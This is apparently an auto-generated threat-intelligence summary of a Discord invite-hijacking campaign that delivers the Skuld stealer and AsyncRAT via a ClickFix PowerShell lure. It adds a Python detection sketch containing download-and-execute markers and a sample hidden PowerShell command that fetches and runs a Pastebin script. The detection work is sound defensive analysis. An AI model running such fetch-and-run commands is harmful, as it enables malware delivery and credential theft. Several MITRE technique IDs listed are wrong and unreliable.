Full Report
A new malware campaign is exploiting a weakness in Discord's invitation system to deliver an information stealer called Skuld and the AsyncRAT remote access trojan. "Attackers hijacked the links through vanity link registration, allowing them to silently redirect users from trusted sources to malicious servers," Check Point said in a technical report. "The attackers combined the ClickFix
Analysis Summary
# Tool/Technique: Skuld Stealer
## Overview
Skuld is a new information stealer, written in Go (Golang), designed to harvest sensitive user data, particularly targeting cryptocurrency wallet credentials and seed phrases from various applications.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Windows (Implied, as it interacts with Windows processes and PowerShell)
- Capabilities: Steals data from Discord, browsers, crypto wallets (Exodus, Atomic), harvests seed phrases, uses wallet injection, and communicates via Discord webhooks.
- First Seen: Mentioned in a June 2023 context (based on the linked article date, though the campaign context is recent).
## MITRE ATT&CK Mapping
- T1555 - Credentials from Files
- T1555.003 - Credentials from Password Stores
- T1056 - Input Capture
- T1056.001 - Keylogging
- T1003 - OS Credential Dumping
- T1003.001 - LSASS Memory
## Functionality
### Core Capabilities
- Steals sensitive user data from Discord, various web browsers, and gaming platforms.
- Specifically targets and harvests crypto wallet information, including seed phrases and passwords from Exodus and Atomic wallets.
- Data exfiltration is conducted via Discord webhooks.
### Advanced Features
- **Wallet Injection:** A technique that replaces legitimate application files with trojanized versions downloaded from GitHub to facilitate credential theft.
- Leverages a custom version of ChromeKatz to bypass Chrome's app-bound encryption protections.
- Payload delivery utilizes trusted cloud services (Bitbucket, Pastebin) to maintain stealth.
## Indicators of Compromise
- File Hashes: [Not specified in the text]
- File Names: [Not specified in the text]
- Registry Keys: [Not specified in the text]
- Network Indicators: Data exfiltrated via **Discord webhooks**. Downloaded payloads sourced from **Bitbucket** and **Pastebin**.
- Behavioral Indicators: Execution of a PowerShell script retrieved from Pastebin following clipboard manipulation. File replacement tactics indicative of wallet injection.
## Associated Threat Actors
- Threat actor responsible for the Discord invitation hijacking campaign (Specific group name not mentioned, but associated with the use of AsyncRAT).
## Detection Methods
- Signature-based detection: Signatures tuned against the Go binary structure or known C2 traffic patterns (Discord webhooks).
- Behavioral detection: Monitoring for unusual file replacement operations targeting crypto wallet application files (wallet injection).
- YARA rules if available: YARA rules targeting Go binaries with compilation properties known to be associated with Skuld.
## Mitigation Strategies
- Users should be wary of unknown or unexpected Discord invitation links, even if they appear to come from trusted sources.
- Implement strict controls on running PowerShell scripts initiated via unintended user input (e.g., pasted content from the clipboard).
- Security software should monitor processes interacting with cryptocurrency wallet directories for file modification/replacement.
- Disable or restrict the ability to run non-standard executables or scripts obtained from untrusted automation workflows.
## Related Tools/Techniques
- AsyncRAT (Used in conjunction as the RAT payload).
- ClickFix (Social engineering technique used to trick users into executing the initial PowerShell command).
- ChromeKatz (Custom version used to bypass Chrome encryption).
- Wallet Injection (Technique used by Skuld against crypto wallets).
***
# Tool/Technique: AsyncRAT
## Overview
AsyncRAT is a Remote Access Trojan (RAT) used in this campaign to gain comprehensive remote control over the infected systems.
## Technical Details
- Type: Malware family (Remote Access Trojan)
- Platform: Windows (Implied by PowerShell usage, cross-platform capabilities possible)
- Capabilities: Comprehensive remote control, uses a dead drop resolver for C2 communication, deployed via multi-stage loader.
- First Seen: [Not specified in the text for this specific deployment]
## MITRE ATT&CK Mapping
- T1219 - Remote Access Software
- T1219.001 - Trojanized Client Software
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols
## Functionality
### Core Capabilities
- Provides threat actors with full remote control over compromised machines.
- Deployed following the execution of a multi-stage infection chain initiated via Discord interaction.
- Communication with C2 infrastructure is obfuscated.
### Advanced Features
- **Dead Drop Resolver:** Employs this technique to read C2 server details from a file hosted on Pastebin, adding a layer of indirection to C2 discovery.
## Indicators of Compromise
- File Hashes: [Not specified in the text]
- File Names: [Not specified in the text]
- Registry Keys: [Not specified in the text]
- Network Indicators: C2 communication initiated after resolving location from **Pastebin**.
- Behavioral Indicators: Communication patterns consistent with known RAT functionality (e.g., initial check-in after execution).
## Associated Threat Actors
- Threat actor responsible for the Discord invitation hijacking campaign.
## Detection Methods
- Signature-based detection: Known AsyncRAT signatures.
- Behavioral detection: Detecting outbound connections to uncharacteristic IP addresses or domains after an initial script execution, especially those using Pastebin as a C2 resolver.
- YARA rules if available: [Not specified in the text]
## Mitigation Strategies
- Block connections to known C2 domains/IPs associated with AsyncRAT infrastructure.
- Monitor for processes executing commands downloaded from potentially suspicious sources like Pastebin.
- Ensure network segmentation limits the lateral movement capability of a compromised RAT.
## Related Tools/Techniques
- Skuld Stealer (Delivered alongside AsyncRAT).
***
# Technique: Discord Invitation Link Hijacking (Vanity Link Abuse)
## Overview
Attackers exploit a vulnerability or feature in Discord's vanity invite link system, allowing them to reuse expired or deleted unique invite codes to create legitimate-looking links that redirect users to malicious Discord servers.
## Technical Details
- Type: Technique (Initial Access/Delivery Vector)
- Platform: Discord (Social Media Platform)
- Capabilities: Establishing initial access by leveraging expired trust associated with previously used invite links.
- First Seen: Campaign evidence surfaced recently, exploiting the specific mechanism of vanity link reuse.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.002 - Spearphishing Link
- T1190 - Exploit Public-Facing Application
- T1190.002 - Exploit of Web Application Vulnerabilities (Abuse of invite logic)
## Functionality
### Core Capabilities
- Claiming vanity invite codes associated with legitimate, now-defunct servers.
- Silently redirecting users following legacy links to attacker-controlled Discord servers.
### Advanced Features
- **Multi-Stage Delivery:** Used specifically to deliver the infection chain involving Skuld and AsyncRAT.
- **Trust Leveraging:** The technique relies on the inherent trust users place in links previously shared on reputable forums or websites.
## Indicators of Compromise
- File Hashes: [N/A – This is a delivery vector]
- File Names: [N/A]
- Registry Keys: [N/A]
- Network Indicators: Links directing users to Discord servers controlled by the attackers after the initial link redirection.
- Behavioral Indicators: Users joining an unexpected or suspicious Discord server via an expected invite link.
## Associated Threat Actors
- Threat actor utilizing Skuld and AsyncRAT in this campaign.
## Detection Methods
- Signature-based detection: [Not applicable for link inspection alone]
- Behavioral detection: Monitoring for sudden spikes in users joining servers via compromised vanity links. Auditing for invite code reuse attempts on the Discord platform (if external monitoring is possible).
- YARA rules if available: [N/A]
## Mitigation Strategies
- Discord platform changes to prevent the re-registration of expired/deleted permanent vanity codes.
- Users should verify the domain/server reputation before joining any Discord server, regardless of the preceding link's source.
- Security teams should maintain awareness of ongoing invite link abuse techniques.
## Related Tools/Techniques
- ClickFix (Used after the victim joins the server to obtain the initial PowerShell execution).
***
# Technique: ClickFix Social Engineering Tactic
## Overview
A social engineering technique used within the malicious Discord server. Victims are convinced to execute a command line string (a PowerShell command) supposedly for verification purposes, which actually initiates the multi-stage malware download.
## Technical Details
- Type: Technique (Social Engineering/Execution Facilitation)
- Platform: Windows (Requires execution via Windows Run dialog)
- Capabilities: Tricking users into pasting and running a PowerShell command copied to their clipboard.
- First Seen: Social engineering described in the context of previous campaigns (e.g., Atomic macOS stealer).
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (By proxy of initiating payload execution)
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
## Functionality
### Core Capabilities
- The "Verify" button executes JavaScript that copies a PowerShell command to the user's clipboard.
- Users are manually directed to open the Run dialog (Win+R), paste the content, and execute it, thus bypassing potential automatic execution blocks.
### Advanced Features
- Leveraging the perceived necessity of "verification" to coerce higher user interaction and bypass standard browser protections.
## Indicators of Compromise
- File Hashes: [N/A]
- File Names: [N/A]
- Registry Keys: [N/A]
- Network Indicators: Initial download execution triggered by a PowerShell script sourced from **Pastebin**.
- Behavioral Indicators: Clipboard manipulation followed immediately by invocation of `powershell.exe` or execution via `cmd.exe`/Run dialog.
## Associated Threat Actors
- Threat actor utilizing Skuld and AsyncRAT, linked to previous uses of ClickFix.
## Detection Methods
- Signature-based detection: PowerShell command strings associated with this specific delivery method.
- Behavioral detection: Monitoring for PowerShell launched from the Run dialog shortly after clipboard manipulation, where the command line suggests pasted content rather than a normal user workflow.
- YARA rules if available: [N/A]
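A detection sketch that ties together the behavioral indicators listed in this section and in the Skuld section above (PowerShell launched from the Run dialog, script retrieval from Pastebin, and a non-Discord process posting to a Discord webhook). This is an added example, not code from the Check Point report; the event schema, field names and sample events are constructed to resemble Sysmon process-creation and network-connection telemetry, and the URLs and paths in them are placeholders.

```python
# Added example (not from the report): correlate constructed process/network events to flag the ClickFix -> Pastebin -> Discord-webhook chain described on this page.
from datetime import datetime, timedelta

PASTE_HOSTS = {"pastebin.com"}   # script / dead-drop host named on the page
WEBHOOK_PATH = "/api/webhooks/"  # Discord webhook path (assumed)
FETCH_MARKERS = ("iwr", "invoke-webrequest", "downloadstring", "iex", "invoke-expression")  # crude substring markers

def is_run_dialog_powershell(ev):
    """powershell.exe spawned by explorer.exe (Win+R Run dialog) with a download marker."""
    return (ev["type"] == "process"
            and ev["image"].lower().endswith("powershell.exe")
            and ev["parent_image"].lower().endswith("explorer.exe")
            and any(m in ev["cmdline"].lower() for m in FETCH_MARKERS))

def is_webhook_exfil(ev):
    """Connection to a Discord webhook URL from anything other than the Discord client."""
    return (ev["type"] == "network" and ev["dest"] == "discord.com"
            and ev.get("url", "").startswith(WEBHOOK_PATH)
            and not ev["image"].lower().endswith("discord.exe"))

def detect_chain(events, window=timedelta(minutes=10)):
    """One (endpoint, reasons) alert per suspicious PowerShell start; reasons grow with
    Pastebin fetches and webhook exfil seen on the same endpoint within `window`."""
    alerts = []
    for s in filter(is_run_dialog_powershell, events):
        later = [e for e in events
                 if e["endpoint"] == s["endpoint"] and s["ts"] <= e["ts"] <= s["ts"] + window]
        reasons = ["powershell launched from Run dialog with download marker"]
        if any(e["type"] == "network" and e["dest"] in PASTE_HOSTS for e in later):
            reasons.append("script retrieved from pastebin")
        if any(is_webhook_exfil(e) for e in later):
            reasons.append("non-Discord process posting to Discord webhook")
        alerts.append((s["endpoint"], reasons))
    return alerts

T0 = datetime(2025, 6, 1, 12, 0, 0)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry; URLs and paths are placeholders, not real IoCs
    {"type": "process", "ts": T0, "endpoint": "WS01", "image": PS,
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -c iex (iwr https://pastebin.com/raw/PLACEHOLDER)"},
    {"type": "network", "ts": T0 + timedelta(seconds=2), "endpoint": "WS01", "image": PS,
     "dest": "pastebin.com", "url": "/raw/PLACEHOLDER"},
    {"type": "network", "ts": T0 + timedelta(seconds=40), "endpoint": "WS01", "dest": "discord.com",
     "image": r"C:\Users\u\AppData\Local\Temp\upd.exe", "url": "/api/webhooks/000/PLACEHOLDER"},
    {"type": "network", "ts": T0, "endpoint": "WS02", "dest": "discord.com",  # legitimate client
     "image": r"C:\Users\u\AppData\Local\Discord\app\Discord.exe", "url": "/api/v9/gateway"},
    {"type": "process", "ts": T0, "endpoint": "WS02", "image": PS,  # normal admin use
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "powershell Get-Process"},
]
```

Running `detect_chain(SAMPLE_EVENTS)` yields a single alert for WS01 carrying all three reasons, while the legitimate Discord client traffic and the cmd.exe-launched PowerShell on WS02 are not flagged.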
## Mitigation Strategies
- Educate users to never copy and paste commands from untrusted sources into the Run dialog or command line.
- Implement application whitelisting or constraints on PowerShell execution, especially when launched outside of standard user workflows.
## Related Tools/Techniques
- PowerShell (The interpreter used for initial payload retrieval).
- Discord Bot Authorization (Used as the pretext for the verification step).